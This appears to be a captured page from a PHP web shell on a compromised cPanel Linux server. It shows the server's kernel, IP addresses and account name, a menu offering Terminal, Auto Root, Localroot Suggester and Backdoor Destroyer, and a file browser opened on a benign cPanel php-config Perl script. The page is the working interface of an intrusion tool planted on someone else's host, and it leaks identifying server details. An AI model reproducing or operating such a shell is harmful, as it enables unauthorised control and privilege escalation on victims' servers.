Linux host2.healingcodesinfo.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
Apache
Server IP : 69.167.168.125 & Your IP : 216.73.216.208
Domains : 126 Domain
User : christia
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
local /
cpanel /
scripts /
php_sandbox /
Delete
Unzip
Name
Size
Permission
Date
Action
php-config
582
B
-rwxr-xr-x
2021-01-07 20:20
Save
Rename
#!/usr/local/cpanel/3rdparty/bin/perl $ENV{'LANG'} = 'C'; my @paths = grep( !/php_sandbox/, split( /:/, $ENV{'PATH'} ) ); my $homedir = ( getpwuid($>) )[7]; foreach my $path (@paths) { next if ( $path =~ /sandbox/i ); if ( -x $path . '/' . 'php-config' ) { if ( grep( /--prefix/, @ARGV ) ) { print "$homedir/php"; exit(); } if ( grep( /--extension-dir/, @ARGV ) ) { print "$homedir/php/ext"; exit(); } exec( $path . '/' . 'php-config', @ARGV ); } } die "php-config not found";